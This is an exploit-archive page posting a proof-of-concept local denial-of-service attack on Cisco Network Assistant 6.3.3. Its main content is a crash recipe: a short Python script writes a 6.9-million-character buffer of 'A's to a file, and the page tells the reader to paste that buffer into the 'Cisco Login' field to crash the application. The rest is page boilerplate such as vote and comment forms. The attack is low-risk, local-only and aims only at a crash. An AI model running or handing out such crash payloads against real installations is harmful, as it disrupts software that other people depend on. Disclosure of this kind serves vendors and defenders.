Cisco Network Assistant 6.3.3 Denial Of Service

2018.08.29

Credit: Luis Martinez

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-27
# Vendor Homepage: https://www.cisco.com/
# Software Link : https://software.cisco.com/download/home/286277276/type/280775097/release/6.3.3
# Tested Version: 6.3.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python Cisco_Network_Assistant_6.3.3.py
# 2.- Open Cisco_Network_Assistant_6.3.3.txt and copy content to clipboard
# 3.- Open Cisco Network Assistant
# 4.- Authenticate to Cisco CCO
# 5.- Paste ClipBoard on "Cisco Login"
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 6900000
f = open ("Cisco_Network_Assistant_6.3.3.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cisco Network Assistant 6.3.3 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.